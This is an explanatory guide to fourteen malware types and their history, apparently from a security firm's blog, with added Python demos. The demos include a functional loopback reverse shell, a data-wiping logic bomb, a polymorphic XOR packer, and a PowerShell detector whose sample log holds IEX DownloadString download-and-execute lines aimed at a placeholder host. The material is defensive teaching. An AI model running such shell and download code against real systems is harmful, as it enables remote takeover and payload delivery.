The 14 types of malware 💣

From the floppy disks of the 1980s, to the worms of the early noughties, to the sophisticated malware of 2024, malware has been on quite the ride! In this short guide we will explore fourteen of the most common types of malware, including rootkits, viruses, spyware, and everything in between!

Not all malware is created equal, and some malware is far more dangerous than other kinds. The word itself is a blend of two words, malicious and software: malware is, quite simply, malicious software.

We will start by looking at each of the main types of malware, before turning our attention to the history of malware and how it has evolved over time. For each category I will give a short synopsis of how it works, how dangerous it is, and how prevalent it is.

The malware is listed in no particular order.

The 14 types of malware

Rootkits

Rootkits are one of the most serious forms of malware and are extremely difficult to detect and remove. Whilst most of the other malware in this list runs as an ordinary program on top of the operating system, a rootkit buries itself inside the operating system itself (the kernel, its drivers, the boot process or even firmware) and hooks the very functions that security software relies on to list files, processes and network connections. Because the rootkit controls what those functions report, it can hide itself and any other malware it protects, which makes it almost impossible for antivirus software running on the same machine to detect.

Rootkits have a history dating back to the early days of computing, and they have evolved with the technology around them. Originally they were associated with Unix systems, where an attacker who had gained "root" (administrator) access would replace core system utilities such as ls, ps and netstat with trojaned copies that hid the attacker's files and processes; hence the name. As operating systems and security measures advanced, so did rootkits, moving from replaced binaries to kernel-level hooks. By the late 1990s rootkits had also appeared on Windows. Early rootkits focused on concealing malicious processes and files, making them difficult to detect.

Ransomware

Ransomware is one of the most common forms of malware today, and a well-executed attack can bring an entire business or organisation to a standstill.

Once your computer is infected by ransomware, your files are encrypted and you are told to pay the criminals to get them back. Because the files are encrypted, your system becomes virtually unusable until you obtain the decryption key, which the attackers will only hand over (if at all) once a ransom has been paid, usually in cryptocurrency.
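Because ransomware has to rewrite every file it touches with ciphertext, its activity on disk looks quite unlike normal use: the new file contents have near-maximal byte entropy, many files change in quick succession, and they are usually renamed as they go. The following is an added example, not code from the page, showing the classic heuristic a defender runs over file-write events to spot that burst. The event format, the entropy threshold and the burst window are assumptions, and the event stream is constructed.

```python
"""Heuristic ransomware detection: ciphertext has near-maximal byte entropy, and
ransomware rewrites many files in quick succession, usually renaming them as it
goes. Added example, not code from the page. The file event format, the entropy
threshold and the burst window are assumptions."""
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(data: bytes, threshold: float = 7.5) -> bool:
    """Plain documents and source code sit well below 7.5 bits/byte; ciphertext,
    like compressed data, sits close to 8.0 (so compressed archives are a known
    false-positive source for this heuristic when it is used on its own)."""
    return shannon_entropy(data) >= threshold


def extension_changed(old_path: str, new_path: str) -> bool:
    return old_path.rsplit(".", 1)[-1] != new_path.rsplit(".", 1)[-1]


def first_alert_index(events, window: int = 10, min_hits: int = 5):
    """Scan file-write events in order. An event is suspicious when the new content
    looks encrypted AND the file was renamed to a different extension. Return the
    index of the event at which `min_hits` suspicious events fall inside `window`
    consecutive events, or None if the stream never looks like a ransomware burst."""
    recent = []
    for i, ev in enumerate(events):
        if looks_encrypted(ev["data"]) and extension_changed(ev["path"], ev["new_path"]):
            recent.append(i)
        recent = [h for h in recent if i - h < window]
        if len(recent) >= min_hits:
            return i
    return None


def pseudo_ciphertext(seed: bytes, length: int) -> bytes:
    """Stand-in for an encrypted file (constructed): a SHA-256 counter stream is
    indistinguishable from real ciphertext as far as the entropy check is concerned."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def build_sample_events():
    """Constructed event stream: six normal document saves, then a ransomware burst
    that overwrites eight documents with ciphertext and renames them to .locked."""
    text = b"Quarterly report: revenue up 4%, costs flat, headcount unchanged.\n" * 40
    events = [{"path": f"docs/report{i}.docx", "new_path": f"docs/report{i}.docx", "data": text}
              for i in range(6)]
    for i in range(8):
        events.append({
            "path": f"docs/report{i}.docx",
            "new_path": f"docs/report{i}.docx.locked",
            "data": pseudo_ciphertext(f"victim-file-{i}".encode(), 4096),
        })
    return events


if __name__ == "__main__":
    print("alert raised at event index:", first_alert_index(build_sample_events()))
```

On the constructed stream the alert fires at the fifth encrypted rewrite, well before the remaining files are lost; in a real deployment the same logic is fed from a file-system audit source and the response is to suspend the writing process.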

There is a debate in the cybersecurity community as to the best approach to responding to ransomware attacks. Even if you pay, there is no guarantee that you will get your files back. And even if you do, the attackers may well have copied your data before encrypting it, and can extort you again by threatening to leak or sell it. Plus, if you are known to pay ransomware gangs, this can make you a prime target for other criminals, as they know that if they compromise your systems there is a high chance of a lucrative payout.

Despite being so prominent in 2024, ransomware has a relatively long history, with early instances dating back to the late 1980s. The first known ransomware, the AIDS Trojan of 1989, targeted MS-DOS systems and scrambled file names, demanding payment to restore access. Over the years ransomware grew in sophistication, adopting strong encryption to lock files securely. The rise of cryptocurrency, especially Bitcoin, in the 2010s, and more recently the privacy coin Monero, made it easier for attackers to collect ransoms that are hard to trace, contributing to the widespread growth of ransomware attacks.

Ransomware is a huge problem for both businesses and private individuals, and the problem is continuously getting worse.

Botnets

The term "botnet" is a combination of "robot" and "network". The concept took off in the early 2000s when malicious actors started using networks of compromised computers, often called "bots" or "zombies", to perform coordinated actions under the control of a command-and-control server.

The first prominent botnets were used for activities like distributed denial-of-service (DDoS) attacks. In this kind of attack, your infected computer is added to a network of other infected computers, and each one is instructed by the operator to send an enormous number of requests to a web server, overwhelming it so that legitimate users cannot get through.

Over time, botnets have evolved in complexity, and attackers use increasingly sophisticated methods to control and monetise these networks, renting them out for spam, DDoS, credential stuffing and the distribution of other malware.

Trojans

The term “Trojan horse” originates from Greek mythology, referring to the wooden horse used by the Greeks to infiltrate the city of Troy. In the context of computing, a Trojan horse is a type of malware that disguises itself as legitimate software but contains malicious code.

The user is tricked into installing the Trojan, which then gives the attacker unauthorised access or carries out malicious activities on their behalf. Trojans have been around since the early days of malware, with early instances targeting personal computers.

If you are a gamer who installs modifications, or mods, to enhance your games, be aware that some of these downloads are in fact trojan horses that will compromise your computer.


Reverse Shells

A reverse shell is a technique used in computer security and penetration testing where an attacker establishes a connection from a target system to a machine controlled by the attacker. This allows the attacker to gain remote access and control over the compromised system.

The term “reverse” refers to the direction of the connection – instead of the typical client-to-server communication, the compromised system becomes the client that initiates a connection back to the attacker’s machine, which acts as the server.

What makes a reverse shell so dangerous is that it bypasses firewalls. Most firewalls are configured to block unsolicited inbound connections to a machine but to allow outbound connections from it, so a connection that the compromised system initiates towards the attacker usually sails straight through. A reverse shell is the payload that a trojan, an exploit or a malicious macro typically delivers, which is why it turns up in almost every intrusion.
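The exchange described above, as an added example that is not code from the page: both ends run in one process on 127.0.0.1, the "attacker" side listens, the "target" side connects out, executes the one harmless command it receives and returns the output. A real reverse shell wires a /bin/sh or cmd.exe process directly to the socket and keeps the channel open interactively; this demo sends a single fixed command so that it terminates on its own. The port number is chosen by the operating system and the command string is an assumption.

```python
"""Loopback demonstration of a reverse shell's connection direction. The 'attacker'
side LISTENS; the 'target' side CONNECTS OUT, then executes whatever arrives and
sends the output back. Added example, not code from the page: it runs entirely on
127.0.0.1 and executes a single harmless, fixed command."""
import socket
import subprocess
import threading


def attacker_listener(ready: threading.Event, result: dict, command: str) -> None:
    """Attacker's machine: bind, wait for the victim to call home, send one command,
    then read the reply until the victim closes the connection."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: the OS picks a free port for the demo
    srv.listen(1)
    result["port"] = srv.getsockname()[1]
    ready.set()                          # tell the demo driver the listener is up
    conn, peer = srv.accept()
    srv.close()
    with conn:
        result["peer"] = peer            # the *victim* is the connecting peer
        conn.sendall(command.encode() + b"\n")
        conn.shutdown(socket.SHUT_WR)    # no more commands; a real shell keeps going
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    result["output"] = b"".join(chunks).decode(errors="replace")


def target_reverse_shell(host: str, port: int) -> None:
    """Compromised machine: an OUTBOUND connection (what most firewalls allow),
    then a read-execute-reply loop until the attacker hangs up."""
    with socket.create_connection((host, port)) as sock:
        rfile = sock.makefile("rb")
        for line in rfile:
            cmd = line.decode().strip()
            if not cmd:
                continue
            proc = subprocess.run(cmd, shell=True, capture_output=True)
            sock.sendall(proc.stdout + proc.stderr)
        rfile.close()


def run_demo(command: str = "echo reverse-shell-demo") -> str:
    """Run both ends in one process and return the command output the attacker sees."""
    ready, result = threading.Event(), {}
    listener = threading.Thread(target=attacker_listener, args=(ready, result, command))
    listener.start()
    ready.wait()
    target_reverse_shell("127.0.0.1", result["port"])
    listener.join()
    return result["output"]


if __name__ == "__main__":
    print(run_demo(), end="")
```

From the defender's side the give-away is exactly the asymmetry the code relies on: on the victim the connection shows up as an established outbound session from a process that has no business talking to the internet (an office document, a script interpreter), and egress filtering or proxy-only internet access is what breaks it.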

Logic Bombs

A logic bomb is a form of malicious code that is intentionally inserted into a computer program or system with the purpose of triggering a harmful action when specific conditions are met.

Unlike many other types of malware that are designed to spread or perform malicious activities immediately, a logic bomb remains dormant until a particular event or set of circumstances occurs, at which point it is activated to execute its malicious payload.

The term "logic bomb" is derived from the idea of a time bomb: it is set to go off when a logical condition, rather than a timer alone, is satisfied.

So, for example, a logic bomb could detonate its payload on a Wednesday at 9pm, but only if the user has completed a predefined set of actions first.
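The following is an added example, not code from the page, of the "Wednesday at 9pm after a set of user actions" bomb described above, hidden inside an otherwise legitimate-looking backup routine, together with the check a defender uses against this class of malware. Logic bombs survive normal testing precisely because the trigger never occurs during it, so malware sandboxes fast-forward the clock; the sweep below does the same. The trigger conditions, the sample records and the one-week sweep are assumptions.

```python
"""A logic bomb hidden inside an otherwise legitimate routine, plus a clock-sweep
check against it. Added example, not code from the page; the trigger conditions,
the sample data and the one-week sweep are assumptions."""
from datetime import datetime, timedelta

WEDNESDAY = 2        # datetime.weekday(): Monday == 0
TRIGGER_HOUR = 21    # 9pm
REQUIRED_ACTIONS = 3


def trigger_met(now: datetime, actions_completed: int) -> bool:
    """The 'logic' in logic bomb: a conjunction of conditions, not just a timer."""
    return (now.weekday() == WEDNESDAY
            and now.hour == TRIGGER_HOUR
            and actions_completed >= REQUIRED_ACTIONS)


def archive_records(records: dict, now: datetime, actions_completed: int) -> dict:
    """Looks like a harmless backup helper and behaves like one on every call except
    when the trigger fires, at which point it wipes the live data instead of copying it."""
    if trigger_met(now, actions_completed):
        records.clear()          # the payload: dormant until the trigger is satisfied
        return {}
    return dict(records)


def sweep_clock_for_divergence(days: int = 7, actions_completed: int = 5):
    """Defender-side check: call the routine at every hour of a week against a fresh
    copy of the data and report the timestamps at which its behaviour diverges from
    the baseline. The hidden trigger is found without reading the code."""
    baseline = {"invoice-001": "paid", "contract-17": "signed"}
    start = datetime(2024, 1, 1)  # a Monday
    divergent = []
    for hour in range(days * 24):
        now = start + timedelta(hours=hour)
        if archive_records(dict(baseline), now, actions_completed) != baseline:
            divergent.append(now)
    return divergent


if __name__ == "__main__":
    for when in sweep_clock_for_divergence():
        print("behaviour changes at", when)
```

Note that the sweep only finds the bomb because it also satisfies the action count; a trigger that depends on state the sandbox never reaches (a particular username, a file that only exists on the real target) is exactly how real logic bombs stay dormant under analysis.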

Worms

Worms are a type of malware that has been present in the computing landscape since the early days of networked systems. One of the earliest and most infamous worms is the Morris Worm, which was unleashed in 1988.

Created by Robert Tappan Morris, it was intended to gauge the size of the internet but ended up causing widespread disruption by exploiting vulnerabilities in common Unix services and replicating uncontrollably (a flaw in its check for machines it had already infected meant it reinfected the same hosts over and over). Since then, various worms have emerged, each with its own propagation techniques and payloads.

Worms are an interesting, and incredibly dangerous, form of malware. Unlike a virus, a worm does not need a host file or a user to run it: once one computer is infected, the worm scans for other reachable machines and copies itself to them automatically, so an infection spreads rapidly.

Worms have evolved over time to exploit new vulnerabilities and propagate through different vectors. Modern worms often combine various propagation techniques, such as exploiting software vulnerabilities, using social engineering in phishing emails, or leveraging removable media like USB drives.

Preventive measures against worms include regular software updates to patch known vulnerabilities, implementing network security measures, using firewalls, and employing intrusion detection and prevention systems. Security awareness training helps users recognise and avoid social engineering tactics often used by worms. Incident response plans are crucial for organisations to mitigate the impact of worm infections promptly.

Despite advancements in security, worms remain a persistent threat, and cybersecurity efforts must continually adapt to the evolving landscape of this self-replicating malware.


Spyware

Spyware is a type of malicious software designed to secretly gather information about a user or organisation without their knowledge or consent. It operates covertly, collecting sensitive data such as browsing habits, login credentials, personal information, or financial details. The gathered data is then transmitted to third parties, often for malicious purposes, such as identity theft, fraud, or unauthorised surveillance.

Spyware can include keyloggers (which record everything you type), the ability for an attacker to switch on your webcam or microphone, and activity logs of everything you do on your device.

Spyware is often the payload inside a trojan horse, and the data it steals can be used to extort you by threatening to leak sensitive, private information.

Viruses

A computer virus is a type of malicious software that attaches itself to legitimate programs or files with the aim of replicating and spreading to other files or systems. Like a biological virus, computer viruses require a host to survive and propagate. They often cause harm by modifying or deleting data, disrupting system operations, or providing unauthorised access to the infected system.

Adware

Whilst adware may not be as dangerous as other forms of malware, it can be annoying and distressing, to say the least.

Adware, short for advertising-supported software, is a type of software that displays unwanted advertisements on a user’s device.

While adware itself may not be inherently malicious, it can be intrusive and negatively impact the user experience by delivering unwanted ads, pop-ups, or banners.

In some cases, adware may also collect user data to personalise advertisements or track online behavior for marketing purposes.

Not all adware is malicious. Much of it is better classed as a Potentially Unwanted Application, or PUA: software the user did not knowingly ask for and would probably rather not have.

Fileless malware

Fileless malware is a type of malicious software that runs in a system's volatile memory (RAM) and leaves little or nothing on the computer's hard drive.

Unlike traditional malware that relies on executable files dropped to disk, fileless malware is designed to reside in memory, often by abusing legitimate tools that are already present on the system (PowerShell, WMI, scheduled tasks, the registry). That makes it more challenging to detect and analyse with conventional antivirus and anti-malware solutions, which are built around scanning files.

This type of malware is more likely to be used by advanced persistent threats (APT) or more experienced hackers.
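Because fileless attacks on Windows so often begin as a PowerShell command line and never write a binary to disk, the command line recorded in process-creation logs is the artefact a defender has to work with. The following is an added example, not code from the page, that scores command lines for the tell-tale switches and download cradles and decodes -EncodedCommand payloads (which PowerShell expects as base64 over UTF-16LE text) so the hidden script can be read. The log lines are constructed, the stage-two URL uses the reserved .invalid TLD, and the indicator list is a starting point rather than a complete ruleset.

```python
"""Scorer for fileless PowerShell command lines in process-creation logs. Added
example, not code from the page; log lines are constructed and the indicator
list is a starting point, not a complete ruleset."""
import base64
import re

INDICATORS = {
    # PowerShell accepts any unambiguous prefix of a switch, hence -e, -ec, -enc...
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Invoke-RestMethod", re.I),
}


def encode_powershell(script: str) -> str:
    """Exactly what `powershell -EncodedCommand` expects: base64 over UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an -EncodedCommand blob,
    otherwise None. Malformed base64 is reported rather than raised, because attackers
    also pad or mangle blobs to break naive decoders."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable payload>"


def analyse(cmdline: str) -> dict:
    """Score one process-creation command line. The decoded payload is scanned too,
    because the interesting indicators (IEX, download cradles) usually hide inside it."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(haystack)]
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "score": len(hits)}


def triage(log, threshold: int = 2):
    """Indices of log lines whose score reaches the threshold, most suspicious first."""
    scored = [(analyse(line)["score"], i) for i, line in enumerate(log)]
    return [i for score, i in sorted(scored, key=lambda s: -s[0]) if score >= threshold]


# Constructed sample log: two fileless-style launches, one legitimate script, one cmd.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_LOG = [
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + encode_powershell(STAGE2),
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a.ps1\')"',
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    "cmd.exe /c dir C:\\Users",
]

if __name__ == "__main__":
    for i in triage(SAMPLE_LOG):
        r = analyse(SAMPLE_LOG[i])
        print(r["score"], r["indicators"], "->", r["decoded"] or r["cmdline"])
```

The encoded launch scores highest only because the payload was decoded before matching; scanning the raw command line alone would have seen three generic switches and missed the download cradle entirely. Script Block Logging (Event ID 4104) gives the same decoded view from the PowerShell engine itself and is the complementary source worth enabling.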

Mobile malware

Mobile malware refers to malicious software specifically designed to target mobile devices, such as smartphones and tablets.

As mobile devices have become integral to our daily lives, cybercriminals increasingly develop various forms of malware to exploit vulnerabilities, steal sensitive information, or carry out other malicious activities on these platforms.

Whilst mobile malware was almost nonexistent 15 years ago, it is becoming an increasingly prominent threat. Generally speaking, Android devices (particularly those that sideload apps from outside the official store) and jailbroken iPhones are more likely to be compromised than stock iOS devices; the notable exception is Pegasus, a dangerous threat to iOS devices.

Created by the Israeli NSO Group, Pegasus is zero-click malware that can infect your device through the simple act of receiving a message, with no tap or interaction required. I will publish an article about how Pegasus works in March 2024; please subscribe to my newsletter to be notified when the article is published.

Polymorphic malware

Polymorphic malware is a type of malicious software that has the ability to change its code or appearance dynamically while maintaining its core functionality.

This characteristic makes it challenging for traditional antivirus programs to detect and block polymorphic malware using static signature-based methods. Polymorphic malware uses various techniques to alter its code, such as encryption, obfuscation, and code rewriting, with the aim of evading detection by security tools.
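The following is an added example, not code from the page, of the encryption technique in miniature: every copy wraps the same payload in a fresh random XOR key, so each copy has a different hash and shares no fixed byte sequence with the others, yet decodes to the identical payload. It also shows why a signature on the raw file fails while a scanner that emulates the decoder first still catches it. The container format (MAGIC, key length, key, encoded payload) is invented for the demo, and the payload is an inert string rather than executable code.

```python
"""Polymorphic packing in miniature. Added example, not code from the page; the
container format (MAGIC | key length | key | encoded payload) is invented for the
demo and the payload is an inert string, not executable code."""
import hashlib
import os
import random

MAGIC = b"PM1"
PAYLOAD = b"__inert_demo_payload__ DELETE *.bak"   # constructed; does nothing
SIGNATURE = b"DELETE *.bak"                           # what a naive scanner looks for


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def generate_variant(payload: bytes, key_len: int = 8, rng=os.urandom) -> bytes:
    """Produce one polymorphic copy. A key byte of 0 would leave plaintext bytes
    visible, so such keys are rejected, as a real engine would."""
    key = rng(key_len)
    while 0 in key:
        key = rng(key_len)
    return MAGIC + bytes([key_len]) + key + xor_bytes(payload, key)


def unpack(sample: bytes) -> bytes:
    """The 'decoder stub': what the malware runs at start-up, and what an antivirus
    emulator replays to recover the stable payload underneath."""
    if not sample.startswith(MAGIC):
        raise ValueError("not a PM1 container")
    key_len = sample[len(MAGIC)]
    key_start = len(MAGIC) + 1
    key = sample[key_start:key_start + key_len]
    return xor_bytes(sample[key_start + key_len:], key)


def static_signature_matches(sample: bytes, signature: bytes = SIGNATURE) -> bool:
    """Naive scanner: a fixed byte string checked against the file as stored."""
    return signature in sample


def emulated_signature_matches(sample: bytes, signature: bytes = SIGNATURE) -> bool:
    """Scanner that emulates the decoder first, then signatures the decoded form."""
    try:
        return signature in unpack(sample)
    except ValueError:
        return False


def seeded_rng(seed: int):
    """Deterministic stand-in for os.urandom so runs are reproducible."""
    return random.Random(seed).randbytes


def distinct_hashes(payload: bytes, count: int, seed: int = 0) -> int:
    """How many different SHA-256 values `count` variants of one payload produce."""
    return len({hashlib.sha256(generate_variant(payload, rng=seeded_rng(seed + i))).hexdigest()
                for i in range(count)})


if __name__ == "__main__":
    sample = generate_variant(PAYLOAD)
    print("raw signature hit:     ", static_signature_matches(sample))
    print("emulated signature hit:", emulated_signature_matches(sample))
    print("distinct hashes in 20 copies:", distinct_hashes(PAYLOAD, 20))
```

In this toy the decoder stub is a fixed Python function, so a scanner could simply signature the stub; real polymorphic engines also mutate the stub on every copy (instruction substitution, register renaming, junk code), which is what pushes detection towards emulation and behaviour rather than bytes.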

I have published an article on how polymorphic malware works, and how hackers use it to bypass antivirus and forensic software. The article covers how antivirus works, and how it doesn't. Click on the link to skip to the relevant section on the practical applications of polymorphic malware.

Scareware

Scareware is a type of malicious software or deceptive tactic that aims to scare or trick users into taking specific actions, typically for financial gain.

Scareware often uses alarming or misleading messages to create a sense of urgency or fear, prompting users to pay for unnecessary or fraudulent services. The classic example is the fake "Your PC is infected!" pop-up that pushes a bogus antivirus product.

It doesn't necessarily involve the installation of harmful software but relies on social engineering to exploit users' concerns. Scareware is less prominent when compared to other forms of malware, and is arguably less dangerous.

A quick history of malware and how it evolved

Hackers and cybersecurity professionals are locked in a constantly evolving game of cat and mouse, with no clear end in sight.

From the early days of floppy disks to the advanced persistent threats (APTs) of 2024, I have tried to succinctly summarise the birth of malware all the way to how malware has evolved to where we are today in 2024.

1980s: The Birth Of Malware

1982: The first widely recognised computer virus, Elk Cloner, targeted Apple II systems. It spread via infected floppy disks.
1986: The Brain virus, the first PC virus, emerged. It infected MS-DOS boot sectors and spread through infected floppy disks.

1990s: The rise of worms and macro viruses

1992: The Michelangelo virus gained attention for triggering on March 6, damaging data on infected systems.
1990–1991: The first polymorphic viruses, 1260 and Tequila, appeared; by changing their code on every infection they forced antivirus vendors to move beyond simple signature matching.
1999: The Melissa virus, a macro virus spread via email attachments in Microsoft Word documents, highlighted the increasing danger of email-based malware.

Early 2000s:

2000: The ILOVEYOU worm spread globally via email, causing massive disruptions by overwriting files.
2001: Code Red and Nimda worms exploited vulnerabilities in Microsoft software, emphasizing the need for secure coding practices.
2004: Spyware such as CoolWebSearch became widespread, marking a shift towards malware focused on information theft.

Mid-2000s: Rise of trojans, botnets, and ransomware

2004: The first mobile malware, Cabir, targeted Symbian OS phones, spreading from handset to handset over Bluetooth.
2008: Conficker worm exploited Windows vulnerabilities, forming one of the largest botnets and emphasising the importance of timely patching.
2010: Stuxnet, a sophisticated worm, targeted industrial systems, showcasing the potential for state-sponsored cyber-attacks.

2010s: Advanced persistent threats and ransomware

2011: Duqu, linked to Stuxnet, introduced advanced capabilities, illustrating the rise of APTs.
2013: CryptoLocker popularised modern ransomware, using strong public-key encryption and demanding payment in Bitcoin.
2017: WannaCry ransomware spread as a worm by exploiting a Windows SMB vulnerability that Microsoft had patched two months earlier, impacting organisations globally and highlighting the need for timely patching.

Late 2010s to present: the evolving threat landscape

2018: Emotet, which began life as a banking trojan in 2014, grew into a major malware loader, renting its access to other criminal groups and distributing a range of payloads.
2019: Ryuk ransomware gained prominence for targeting high-profile organisations and demanding large ransoms.
2020s: Continued growth of sophisticated ransomware attacks, supply chain attacks (e.g., SolarWinds), and the rise of fileless and living-off-the-land attacks.

UK Cybersecurity Company

About Aitken Security

Aitken Security is a UK Cybersecurity Company specialising in offensive and defensive security.